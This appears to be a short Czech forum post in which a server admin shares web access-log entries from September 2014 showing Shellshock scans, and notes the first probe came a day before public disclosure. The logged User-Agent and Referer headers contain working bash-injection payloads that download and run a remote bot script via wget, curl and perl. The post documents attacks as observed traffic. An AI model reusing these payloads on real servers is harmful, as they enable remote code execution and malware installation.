Hledal jsem a našel:
209.126.230.72 - - [25/Sep/2014:01:48:40 +0200] "GET / HTTP/1.0" 200 11783 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
54.251.83.67 - - [26/Sep/2014:11:57:26 +0200] "GET / HTTP/1.1" 200 11764 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
217.14.242.115 - - [28/Sep/2014:07:01:38 +0200] "GET / HTTP/1.0" 200 11783 "-" "() { :;}; /bin/bash -c \"wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\""
193.251.74.117 - - [28/Sep/2014:10:58:56 +0200] "GET / HTTP/1.0" 200 11783 "-" "() { :;}; /bin/bash -c \"wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\""
67.227.0.77 - - [29/Sep/2014:09:14:00 +0200] "GET / HTTP/1.0" 200 11783 "-" "() { :;}; /bin/bash -c \"wget -P /var/tmp 174.143.240.43/.../x ; perl /var/tmp/x\""
Zaujalo mě, že první oťukávání je z 25. tedy asi tak den před ofiko provalením.
m.